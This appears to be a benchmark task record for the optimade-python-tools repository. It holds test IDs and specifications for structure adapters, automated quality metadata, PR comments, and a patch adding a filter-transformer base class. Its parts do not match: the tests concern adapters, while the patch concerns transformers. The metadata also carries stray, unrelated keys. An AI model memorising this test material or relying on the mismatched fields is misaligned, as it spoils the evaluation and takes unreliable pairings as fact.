pytest.approx(volume_from_cellpar) diff --git a/tests/adapters/structures/utils.py b/tests/adapters/structures/utils.py new file mode 100644 index 00000000..fb889a6d --- /dev/null +++ b/tests/adapters/structures/utils.py @@ -0,0 +1,14 @@ +from pathlib import Path +import re + + +def get_min_ver(dependency: str) -> str: + """Retrieve version of `dependency` from setup.py, raise if not found.""" + setup_py = Path(__file__).parent.joinpath("../../../setup.py") + with open(setup_py, "r") as setup_file: + for line in setup_file.readlines(): + min_ver = re.findall(fr'"{dependency}~=([0-9]+(\.[0-9]+){{,2}})"', line) + if min_ver: + return min_ver[0][0] + else: + raise RuntimeError(f"Cannot find {dependency} dependency in setup.py")
[ "tests/adapters/references/test_references.py::TestReference::test_instantiate", "tests/adapters/references/test_references.py::TestReference::test_setting_entry", "tests/adapters/references/test_references.py::TestReference::test_convert_wrong_format", "tests/adapters/references/test_references.py::TestReference::test_getattr_order", "tests/adapters/structures/test_structures.py::TestStructure::test_instantiate", "tests/adapters/structures/test_structures.py::TestStructure::test_setting_entry", "tests/adapters/structures/test_structures.py::TestStructure::test_convert", "tests/adapters/structures/test_structures.py::TestStructure::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::TestStructure::test_getattr_order", "tests/adapters/structures/test_structures.py::TestStructure::test_no_module_conversion", "tests/adapters/structures/test_structures.py::TestStructure::test_common_converters" ]
[]
Function: EntryAdapter.__init__(self, entry: dict) Location: optimade.adapters.base.EntryAdapter Inputs: `entry` – a dictionary representing a raw OPTIMADE JSON entry. Outputs: Initializes the adapter instance, setting internal `_entry` to `None`, `_converted` to `{}`, and populates `_common_converters` for `"json"` and `"dict"` serialization. No return value. Description: Constructs an EntryAdapter (or subclass) for lazy conversion of a raw OPTIMADE entry. Called by `Reference(entry)` and `Structure(entry)` in tests. Method: EntryAdapter.entry (property getter) Location: optimade.adapters.base.EntryAdapter Inputs: None. Outputs: Returns the internally stored `EntryResource` instance (e.g., `ReferenceResource` or `StructureResource`). Description: Provides access to the parsed OPTIMADE model object after it has been set via the setter. Used in tests to verify `new_Reference.entry` and `new_Structure.entry`. Method: EntryAdapter.entry (property setter) Location: optimade.adapters.base.EntryAdapter Inputs: `value` – a dictionary representing a raw OPTIMADE entry. Outputs: Sets `_entry` to an `ENTRY_RESOURCE` instance on first call; on subsequent calls prints the warning `"entry can only be set once and is already set."` and leaves the original entry unchanged. No return value. Description: Ensures the underlying OPTIMADE model is assigned only once. Tested via `structure.entry = RAW_STRUCTURES[1]` and `reference.entry = RAW_REFERENCES[1]`. Function: EntryAdapter.convert(self, format: str) -> Any Location: optimade.adapters.base.EntryAdapter Inputs: - `format` – string key identifying the desired conversion (e.g., `"cif"`, `"json"`). Outputs: Returns the converted representation, either from `_type_converters` (custom converters) or `_common_converters` (JSON string or dict). Caches result in `_converted`. Description: Central conversion dispatcher used in tests like `reference.convert(chosen_type)` and `structure.convert(chosen_type)`. Raises `AttributeError` for unknown formats. Static Method: EntryAdapter._get_model_attributes(starting_instances: Union[Tuple[BaseModel], List[BaseModel]], name: str) -> Any Location: optimade.adapters.base.EntryAdapter Inputs: - `starting_instances` – a tuple or list of Pydantic model instances to search. - `name` – dot‑separated attribute path (e.g., `"attributes.species"`). Outputs: The resolved attribute value or raises `AttributeError` if not found. Description: Helper used by `__getattr__` to retrieve nested OPTIMADE model attributes. Method: EntryAdapter.__getattr__(self, name: str) -> Any Location: optimade.adapters.base.EntryAdapter Inputs: `name` – attribute name accessed on the adapter instance. Outputs: - If `name` starts with `"as_"`, returns `self.convert(entry_type)`. - If `name` matches a valid OPTIMADE model attribute (including nested), returns that value. - Otherwise raises `AttributeError` with a helpful message. Description: Provides dynamic attribute access for both conversion shortcuts (`as_cif`, `as_json`) and direct OPTIMADE fields (`id`, `attributes.species`). Tested extensively in `test_getattr_order` for both `Reference` and `Structure`. Class: Reference (subclass of EntryAdapter) Location: optimade.adapters.references.Reference Inputs: Inherits `EntryAdapter.__init__`; expects a reference entry dict. Outputs: Provides all `EntryAdapter` behavior with `ENTRY_RESOURCE = ReferenceResource`. Description: Lazy reference adapter used in reference tests (`optimade.adapters.Reference`). No additional public methods beyond those inherited. Class: Structure (subclass of EntryAdapter) Location: optimade.adapters.structures.Structure Inputs: Inherits `EntryAdapter.__init__`; expects a structure entry dict. Outputs: Provides all `EntryAdapter` behavior with `ENTRY_RESOURCE = StructureResource` and a populated `_type_converters` mapping. Description: Lazy structure adapter used throughout structure tests. Exposes conversion functions for `"aiida_structuredata"`, `"ase"`, `"cif"`, `"pdb"`, `"pdbx_mmcif"`, and `"pymatgen"`. Function: get_aiida_structure_data(optimade_structure: OptimadeStructure) -> StructureData Location: optimade.adapters.structures.aiida.get_aiida_structure_data Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: An `aiida.orm.StructureData` object representing the structure (or `None` with a warning if AiiDA is unavailable). Description: Converts an OPTIMADE structure into AiiDA’s `StructureData`. Tested in `tests/adapters/structures/test_aiida.py` for successful conversion, handling of null positions, null lattice vectors, and special species (vacancies, “X”). Function: get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms Location: optimade.adapters.structures.ase.get_ase_atoms Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: An `ase.Atoms` object representing the structure (or `None` with a warning if ASE is unavailable). May raise `ConversionError` if the structure contains disorder. Description: Converts an OPTIMADE structure to an ASE `Atoms`. Tested in `tests/adapters/structures/test_ase.py`, including error handling for partial occupancies. Function: get_cif(optimade_structure: OptimadeStructure) -> str Location: optimade.adapters.structures.cif.get_cif Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: A string containing a CIF representation of the structure (or `None` with a warning if NumPy is unavailable). Description: Generates a CIF file from an OPTIMADE structure, handling lattice parameters, occupancy, and optional fractional coordinates. Tested in `tests/adapters/structures/test_cif.py`. Function: get_pdb(optimade_structure: OptimadeStructure) -> str Location: optimade.adapters.structures.proteindatabank.get_pdb Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: A string containing the structure in the legacy PDB format (or `None` with a warning if NumPy is unavailable). Description: Produces a PDB file from an OPTIMADE structure, applying rotation/scaling as needed. Tested in `tests/adapters/structures/test_pdb.py`. Function: get_pdbx_mmcif(optimade_structure: OptimadeStructure) -> str Location: optimade.adapters.structures.proteindatabank.get_pdbx_mmcif Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: A string containing the structure in the PDBx/mmCIF format (or `None` with a warning if NumPy is unavailable). (Covered but not exercised in coverage; included for completeness.) Description: Generates a PDBx/mmCIF representation, analogous to `get_pdb`. Tested in `tests/adapters/structures/test_pdbx_mmcif.py`. Function: get_pymatgen(optimade_structure: OptimadeStructure) -> Union[Structure, Molecule] Location: optimade.adapters.structures.pymatgen.get_pymatgen Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: Either a `pymatgen.core.structure.Structure` (for 3‑D periodic structures) or a `pymatgen.core.structure.Molecule` (for lower‑dimensional or null‑lattice cases), or `None` with a warning if pymatgen is unavailable. Description: Converts OPTIMADE structures to pymatgen objects. Tested in `tests/adapters/structures/test_pymatgen.py` for normal structures, null lattice vectors (yielding a `Molecule`), null positions, and special species handling. Function: pad_positions(positions: List[Vector3D], padding: float=None) -> Tuple[List[Vector3D], bool] Location: optimade.adapters.structures.utils.pad_positions Inputs: - `positions` – list of 3‑element vectors possibly containing `None`. - `padding` – optional float to replace `None`; default converts to `float('nan')`. Outputs: A tuple `(new_positions, padded)` where `new_positions` has `None` replaced by the padding value and `padded` is a boolean indicating whether any replacement occurred. Description: Normalizes site position lists for conversion functions. Tested in `tests/adapters/structures/test_utils.py`. Function: pad_cell(lattice_vectors: Tuple[Vector3D, Vector3D, Vector3D], padding: float=None) -> Tuple[Tuple[Vector3D, Vector3D, Vector3D], bool] Location: optimade.adapters.structures.utils.pad_cell Inputs: - `lattice_vectors` – three lattice vectors, each possibly containing `None`. - `padding` – optional float; defaults to `float('nan')`. Outputs: A tuple `(new_cell, padded)` with `None` replaced and a flag indicating padding was applied. Description: Ensures lattice vectors contain numeric values for downstream calculations. Tested in `test_pad_cell`. Function: scaled_cell(cell: Tuple[Vector3D, Vector3D, Vector3D]) -> Tuple[Vector3D, Vector3D, Vector3D] Location: optimade.adapters.structures.utils.scaled_cell Inputs: - `cell` – a 3×3 array of lattice vectors. Outputs: A 3×3 tuple representing the SCALE matrix as defined by the PDB format. Description: Used in PDB conversion and validated against fractional coordinate calculations in `test_scaled_cell_and_fractional_coordinates`. Function: fractional_coordinates(cell: Tuple[Vector3D, Vector3D, Vector3D], cartesian_positions: List[Vector3D]) -> List[Vector3D] Location: optimade.adapters.structures.utils.fractional_coordinates Inputs: - `cell` – lattice vectors. - `cartesian_positions` – Cartesian site positions. Outputs: List of fractional coordinates wrapped into the [0, 1) interval. Description: Provides fractional coordinates for CIF/PDB output and is cross‑validated with `scaled_cell` in tests. Function: cell_to_cellpar(cell, radians: bool=False) -> np.ndarray Location: optimade.adapters.structures.utils.cell_to_cellpar Inputs: - `cell` – 3×3 lattice vectors. - `radians` – if `True`, returns angles in radians; otherwise degrees. Outputs: NumPy array `[a, b, c, alpha, beta, gamma]`. Description: Converts lattice vectors to conventional cell parameters for CIF and PDB generation. Used indirectly in `get_cif` and `get_pdbx_mmcif`; exercised in utility tests.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/references/conftest.py tests/adapters/references/test_references.py tests/adapters/structures/conftest.py tests/adapters/structures/test_aiida.py tests/adapters/structures/test_ase.py tests/adapters/structures/test_cif.py tests/adapters/structures/test_pdb.py tests/adapters/structures/test_pdbx_mmcif.py tests/adapters/structures/test_pymatgen.py tests/adapters/structures/test_structures.py tests/adapters/structures/test_utils.py tests/adapters/structures/utils.py" }
{ "num_modified_files": 19, "num_modified_lines": 1185, "pr_author": "CasperWA", "pr_labels": [ "enhancement: New feature or request", "priority/low: Issue or PR with a consensus of low priority" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue aims to add a full adapters system with conversion functions and tests. The test suite aligns with the described adapter behavior, but the provided code has a critical bug in `optimade/adapters/__init__.py`: it constructs `__all__` using undefined module names (`exceptions`, `references`, `structures`), causing an import error and preventing the tests from running. This is a patch artifact that breaks the environment, matching B5 (PATCH_ARTIFACTS).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
36af320b6070c5c96abc8c1ed67b19ff654e16db
2020-06-02 16:48:25
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=h1) Report > Merging [#287](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/d29f7a1c1e89d69aaeffee87e2e46093814c4d3c&el=desc) will **increase** coverage by `0.14%`. > The diff coverage is `98.66%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #287 +/- ## ========================================== + Coverage 90.05% 90.20% +0.14% ========================================== Files 54 56 +2 Lines 2273 2307 +34 ========================================== + Hits 2047 2081 +34 Misses 226 226 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `90.20% <98.66%> (+0.14%)` | :arrow_up: | | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/filtertransformers/base\_transformer.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL2Jhc2VfdHJhbnNmb3JtZXIucHk=) | `98.18% <98.18%> (ø)` | | | [optimade/filtertransformers/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL19faW5pdF9fLnB5) | `100.00% <100.00%> (ø)` | | | [optimade/filtertransformers/django.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL2RqYW5nby5weQ==) | `91.37% <100.00%> (ø)` | | | [optimade/filtertransformers/elasticsearch.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL2VsYXN0aWNzZWFyY2gucHk=) | `87.89% <100.00%> (+0.15%)` | :arrow_up: | | [optimade/filtertransformers/mongo.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL21vbmdvLnB5) | `97.12% <100.00%> (+0.09%)` | :arrow_up: | | [optimade/server/mappers/entries.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL21hcHBlcnMvZW50cmllcy5weQ==) | `98.24% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=footer). Last update [d29f7a1...59d693e](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). fekad: The `TransformerSkeleton` can be removed for sure. That was just a template for the "developers" and used for debugging.
materials-consortia__optimade-python-tools-287
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ad42c154..d65a1f3b 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -4,22 +4,22 @@ The [Materials Consortia](https://github.com/Materials-Consortia) is very open t This may be anything from simple feedback and raising [new issues](https://github.com/Materials-Consortia/optimade-python-tools/issues/new) to creating [new PRs](https://github.com/Materials-Consortia/optimade-python-tools/compare). -We have below recommendations for setting up an environment in which one may develop the package further. +Recommendations for setting up a development environment can be found in the [Installation instructions](https://www.optimade.org/optimade-python-tools/install/#full-development-installation). ## Getting Started with Filter Parsing and Transforming Example use: ```python -from optimade.filterparser import Parser +from optimade.filterparser import LarkParser -p = Parser(version=(0,9,7)) +p = LarkParser(version=(1, 0, 0)) tree = p.parse("nelements<3") print(tree) ``` ```shell -Tree(start, [Tree(expression, [Tree(term, [Tree(atom, [Tree(comparison, [Token(VALUE, 'nelements'), Token(OPERATOR, '<'), Token(VALUE, '3')])])])])]) +Tree('filter', [Tree('expression', [Tree('expression_clause', [Tree('expression_phrase', [Tree('comparison', [Tree('property_first_comparison', [Tree('property', [Token('IDENTIFIER', 'nelements')]), Tree('value_op_rhs', [Token('OPERATOR', '<'), Tree('value', [Tree('number', [Token('SIGNED_INT', '3')])])])])])])])])]) ``` ```python @@ -27,14 +27,17 @@ print(tree.pretty()) ``` ```shell -start +filter expression - term - atom + expression_clause + expression_phrase comparison - nelements - < - 3 + property_first_comparison + property nelements + value_op_rhs + < + value + number 3 ``` ```python @@ -43,36 +46,31 @@ print(tree.pretty()) ``` ```shell -start +filter expression - term - term - atom - comparison - _mp_bandgap - > - 5.0 - AND - atom + expression_clause + expression_phrase comparison - _cod_molecular_weight - < - 350 -``` - -```python -# Assumes graphviz installed on system (e.g. `conda install -c anaconda graphviz`) and `pip install pydot` -from lark.tree import pydot__tree_to_png - -pydot__tree_to_png(tree, "exampletree.png") + property_first_comparison + property _mp_bandgap + value_op_rhs + > + value + number 5.0 + expression_phrase + comparison + property_first_comparison + property _cod_molecular_weight + value_op_rhs + < + value + number 350 ``` -![example tree](images/exampletree.png) - ### Flow for Parsing User-Supplied Filter and Converting to Backend Query -`optimade.filterparser.Parser` will take user input to generate a `lark.Tree` and feed that to a `lark.Transformer`. -E.g., `optimade.filtertransformers.mongo.MongoTransformer` will turn the tree into something useful for your MondoDB backend: +`optimade.filterparser.LarkParser` will take user input to generate a `lark.Tree` and feed that to a `lark.Transformer`. +E.g., `optimade.filtertransformers.mongo.MongoTransformer` will turn the tree into something useful for your MongoDB backend: ```python # Example: Converting to MongoDB Query Syntax @@ -85,55 +83,23 @@ query = transformer.transform(tree) print(query) ``` -```python -{'$and': [{'_mp_bandgap': {'$gt': 5.0}}, {'_cod_molecular_weight': {'$lt': 350.0}}]} +```json +{ + "$and": [ + {"_mp_bandgap": {"$gt": 5.0}}, + {"_cod_molecular_weight": {"$lt": 350.0}} + ] +} ``` -There is also a [basic JSON transformer][optimade.filtertransformers.json] you can use as a simple example for developing your own transformer. -You can also use the JSON output it produces as an easy-to-parse input for a "transformer" in your programming language of choice. - -```python -class JSONTransformer(Transformer): - def __init__(self, compact=False): - self.compact = compact - super().__init__() - - def __default__(self, data, children): - items = [] - for c in children: - if isinstance(c, Token): - token_repr = { - "@module": "lark.lexer", - "@class": "Token", - "type_": c.type, - "value": c.value, - } - if self.compact: - del token_repr["@module"] - del token_repr["@class"] - items.append(token_repr) - elif isinstance(c, dict): - items.append(c) - else: - raise ValueError(f"Unknown type {type(c)} for tree child {c}") - tree_repr = { - "@module": "lark", - "@class": "Tree", - "data": data, - "children": items, - } - if self.compact: - del tree_repr["@module"] - del tree_repr["@class"] - return tree_repr -``` ### Developing New Filter Transformers -If you would like to add a new transformer, please add: +If you would like to add a new transformer, please raise an issue to signal your intent (in case someone else is already working on this). +Adding a transformer requires the following: -1. A module (.py file) in the `optimade/filtertransformers` folder. -2. Any additional Python requirements must be optional and provided as a separate "`extra_requires`" entry in `setup.py`. +1. A new submodule (`.py` file) in the `optimade/filtertransformers` folder containing an implementation of the transformer object, preferably one that extends `optimade.filtertransformers.base_transformer.BaseTransformer`. +2. Any additional Python requirements must be optional and provided as a separate "`extra_requires`" entry in `setup.py` and in the `requirements.txt` file. 3. Tests in `optimade/filtertransformers/tests` that are skipped if the required packages fail to import. For examples, please check out existing filter transformers. diff --git a/docs/api_reference/filtertransformers/debug.md b/docs/api_reference/filtertransformers/debug.md deleted file mode 100644 index 99ff427d..00000000 --- a/docs/api_reference/filtertransformers/debug.md +++ /dev/null @@ -1,3 +0,0 @@ -# debug - -::: optimade.filtertransformers.debug diff --git a/docs/api_reference/filtertransformers/json.md b/docs/api_reference/filtertransformers/json.md deleted file mode 100644 index 41370588..00000000 --- a/docs/api_reference/filtertransformers/json.md +++ /dev/null @@ -1,3 +0,0 @@ -# json - -::: optimade.filtertransformers.json diff --git a/optimade/filtertransformers/__init__.py b/optimade/filtertransformers/__init__.py index e69de29b..6526f52d 100644 --- a/optimade/filtertransformers/__init__.py +++ b/optimade/filtertransformers/__init__.py @@ -0,0 +1,5 @@ +""" This module implements filter transformer classes for different backends. These +classes typically parse the filter with Lark and produce an appropriate query for the +given backend. + +""" diff --git a/optimade/filtertransformers/base_transformer.py b/optimade/filtertransformers/base_transformer.py new file mode 100644 index 00000000..7f1120ae --- /dev/null +++ b/optimade/filtertransformers/base_transformer.py @@ -0,0 +1,179 @@ +import abc +from lark import Transformer, v_args +from typing import Dict +from optimade.server.mappers import BaseResourceMapper + +__all__ = ("BaseTransformer",) + + +class BaseTransformer(abc.ABC, Transformer): + """Generic filter transformer that handles various + parts of the grammar in a backend non-specific way. + + """ + + # map from standard comparison operators to the backend-specific version + operator_map: Dict[str, str] = { + "<": None, + "<=": None, + ">": None, + ">=": None, + "!=": None, + "=": None, + } + + # map from back-end specific operators to their inverse + # e.g. {"$lt": "$gt"} for MongoDB. + reversed_operator_map: Dict[str, str] = {} + + def __init__(self, mapper: BaseResourceMapper = None): + """Initialise the transformer object, optionally loading in a + resource mapper for use when post-processing. + + """ + self.mapper = mapper + + def postprocess(self, query): + """Post-process the query according to the rules defined for + the backend. + + """ + return query + + def transform(self, tree): + """ Transform the query using the Lark transformer then post-process. """ + return self.postprocess(super().transform(tree)) + + def __default__(self, data, children, meta): + raise NotImplementedError( + f"Calling __default__, i.e., unknown grammar concept. data: {data}, children: {children}, meta: {meta}" + ) + + def filter(self, arg): + """ filter: expression* """ + return arg[0] if arg else None + + @v_args(inline=True) + def constant(self, value): + """ constant: string | number """ + # Note: Return as is. + return value + + @v_args(inline=True) + def value(self, value): + """ value: string | number | property """ + # Note: Return as is. + return value + + @v_args(inline=True) + def non_string_value(self, value): + """ non_string_value: number | property """ + # Note: Return as is. + return value + + @v_args(inline=True) + def not_implemented_string(self, value): + """not_implemented_string: value + + Raises: + NotImplementedError: For further information, see Materials-Consortia/OPTIMADE issue 157: + https://github.com/Materials-Consortia/OPTIMADE/issues/157 + + """ + raise NotImplementedError("Comparing strings is not yet implemented.") + + def property(self, arg): + """ property: IDENTIFIER ( "." IDENTIFIER )* """ + return ".".join(arg) + + @v_args(inline=True) + def string(self, string): + """ string: ESCAPED_STRING """ + return string.strip('"') + + @v_args(inline=True) + def signed_int(self, number): + """ signed_int : SIGNED_INT """ + return int(number) + + @v_args(inline=True) + def number(self, number): + """ number: SIGNED_INT | SIGNED_FLOAT """ + if number.type == "SIGNED_INT": + type_ = int + elif number.type == "SIGNED_FLOAT": + type_ = float + return type_(number) + + @v_args(inline=True) + def comparison(self, value): + """ comparison: constant_first_comparison | property_first_comparison """ + # Note: Return as is. + return value + + @abc.abstractmethod + def value_list(self, arg): + """ value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* """ + + @abc.abstractmethod + def value_zip(self, arg): + """ value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] value)* """ + + @abc.abstractmethod + def value_zip_list(self, arg): + """ value_zip_list: value_zip ( "," value_zip )* """ + + @abc.abstractmethod + def expression(self, arg): + """ expression: expression_clause ( OR expression_clause ) """ + + @abc.abstractmethod + def expression_clause(self, arg): + """ expression_clause: expression_phrase ( AND expression_phrase )* """ + + @abc.abstractmethod + def expression_phrase(self, arg): + """ expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) """ + + @abc.abstractmethod + def property_first_comparison(self, arg): + """property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs | + set_zip_op_rhs | length_op_rhs ) + + """ + + @abc.abstractmethod + def constant_first_comparison(self, arg): + """ constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) """ + + @v_args(inline=True) + @abc.abstractmethod + def value_op_rhs(self, operator, value): + """ value_op_rhs: OPERATOR value """ + + @abc.abstractmethod + def known_op_rhs(self, arg): + """ known_op_rhs: IS ( KNOWN | UNKNOWN ) """ + + @abc.abstractmethod + def fuzzy_string_op_rhs(self, arg): + """ fuzzy_string_op_rhs: CONTAINS value | STARTS [ WITH ] value | ENDS [ WITH ] value """ + + @abc.abstractmethod + def set_op_rhs(self, arg): + """ set_op_rhs: HAS ( [ OPERATOR ] value | ALL value_list | ANY value_list | ONLY value_list ) """ + + @abc.abstractmethod + def length_op_rhs(self, arg): + """ length_op_rhs: LENGTH [ OPERATOR ] value """ + + @abc.abstractmethod + def set_zip_op_rhs(self, arg): + """set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | + ANY value_zip_list ) + + """ + + @abc.abstractmethod + def property_zip_addon(self, arg): + """ property_zip_addon: ":" property (":" property)* """ diff --git a/optimade/filtertransformers/debug.py b/optimade/filtertransformers/debug.py deleted file mode 100644 index b67a35aa..00000000 --- a/optimade/filtertransformers/debug.py +++ /dev/null @@ -1,183 +0,0 @@ -from lark import Transformer - - -class DebugTransformer(Transformer): # pragma: no cover - def __init__(self): - super().__init__() - - def __default__(self, data, children, meta): - print("Node: ", data, children) - return data - - -class TransformerSkeleton(Transformer): # pragma: no cover - """Prints out all the nodes and its arguments during the walk-through of the tree.""" - - def __init__(self): - super().__init__() - - def filter(self, arg): - # filter: expression* - print("Node: ", "filter", arg) - return "filter" - - def constant(self, arg): - # constant: string | number - print("Node: ", "constant", arg) - return "constant" - - def value(self, arg): - # value: string | number | property - print("Node: ", "value", arg) - return "value" - - def value_list(self, arg): - # value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* - print("Node: ", "value_list", arg) - return "value_list" - - def value_zip(self, arg): - # value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] value)* - print("Node: ", "value_zip", arg) - return "value_zip" - - def value_zip_list(self, arg): - # value_zip_list: value_zip ( "," value_zip )* - print("Node: ", "value_zip_list", arg) - return "value_zip_list" - - def expression(self, arg): - # expression: expression_clause [ OR expression ] - print("Node: ", "expression", arg) - return "expression" - - def expression_clause(self, arg): - # expression_clause: expression_phrase [ AND expression_clause ] - print("Node: ", "expression_clause", arg) - return "expression_clause" - - def expression_phrase(self, arg): - # expression_phrase: [ NOT ] ( comparison | predicate_comparison | "(" expression ")" ) - print("Node: ", "expression_phrase", arg) - return "expression_phrase" - - def comparison(self, arg): - # comparison: constant_first_comparison | property_first_comparison - # Note: Do nothing! - print("Node: ", "comparison", arg) - return "comparison" - - def property_first_comparison(self, arg): - # property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs | - # set_zip_op_rhs ) - print("Node: ", "property_first_comparison", arg) - return "property_first_comparison" - - def constant_first_comparison(self, arg): - # constant_first_comparison: constant value_op_rhs - print("Node: ", "constant_first_comparison", arg) - return "constant_first_comparison" - - def predicate_comparison(self, arg): - # predicate_comparison: length_comparison - print("Node: ", "predicate_comparison", arg) - return "predicate_comparison" - - def value_op_rhs(self, arg): - # value_op_rhs: OPERATOR value - print("Node: ", "value_op_rhs", arg) - return "value_op_rhs" - - def known_op_rhs(self, arg): - # known_op_rhs: IS ( KNOWN | UNKNOWN ) - print("Node: ", "known_op_rhs", arg) - return "known_op_rhs" - - def fuzzy_string_op_rhs(self, arg): - # fuzzy_string_op_rhs: CONTAINS string | STARTS [ WITH ] string | ENDS [ WITH ] string - print("Node: ", "fuzzy_string_op_rhs", arg) - return "fuzzy_string_op_rhs" - - def set_op_rhs(self, arg): - # set_op_rhs: HAS ( [ OPERATOR ] value | ALL value_list | ANY value_list | ONLY value_list ) - print("Node: ", "set_op_rhs", arg) - return "set_op_rhs" - - def set_zip_op_rhs(self, arg): - # set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | - # ANY value_zip_list ) - print("Node: ", "set_zip_op_rhs", arg) - return "set_zip_op_rhs" - - def length_comparison(self, arg): - # length_comparison: LENGTH property OPERATOR value - print("Node: ", "length_comparison", arg) - return "length_comparison" - - def property_zip_addon(self, arg): - # property_zip_addon: ":" property (":" property)* - print("Node: ", "property_zip_addon", arg) - return "property_zip_addon" - - def property(self, arg): - # property: IDENTIFIER ( "." IDENTIFIER )* - print("Node: ", "property", arg) - return "property" - - def string(self, arg): - # string: ESCAPED_STRING - print("Node: ", "string", arg) - return "string" - - def number(self, arg): - # number: SIGNED_INT | SIGNED_FLOAT - print("Node: ", "number", arg) - return "number" - - def __default__(self, data, children, meta): - print("Node: ", data, children) - return data - - -if __name__ == "__main__": # pragma: no cover - from optimade.filterparser import LarkParser - - p = LarkParser(version=(0, 10, 0)) - # t = DebugTransformer() - t = TransformerSkeleton() - - # f = 'a.a = "text" OR a<a AND NOT b>=8' - - # single list - - f = "list HAS < 3" - - f = "list HAS < 3, > 4" # -> error - f = "list HAS ALL < 3, > 4" - - # multiple lists - - f = "list1:list2 HAS < 3 : > 4" - f = "list1:list2 HAS ALL < 3 : > 4" - - f = "list1:list2 HAS < 3 : > 4, < 2 : > 5" # -> error - f = "list1:list2 HAS ALL < 3 : > 4, < 2 : > 5" - f = "list1:list2 HAS ALL < 3, < 2 : > 4, > 5" # -> error - - # f = 'list1:list2 HAS < 3, > 4' # -> error - # f = 'list1:list2 HAS ALL < 3, > 4' # -> error - - f = 'elements:elements_ratios HAS ALL "Al":>0.3333, "Al":<0.3334' - f = 'elements:elements_ratios HAS ALL "Al":>0.3333 AND elements_ratio<0.3334' - f = 'elements:elements_ratios 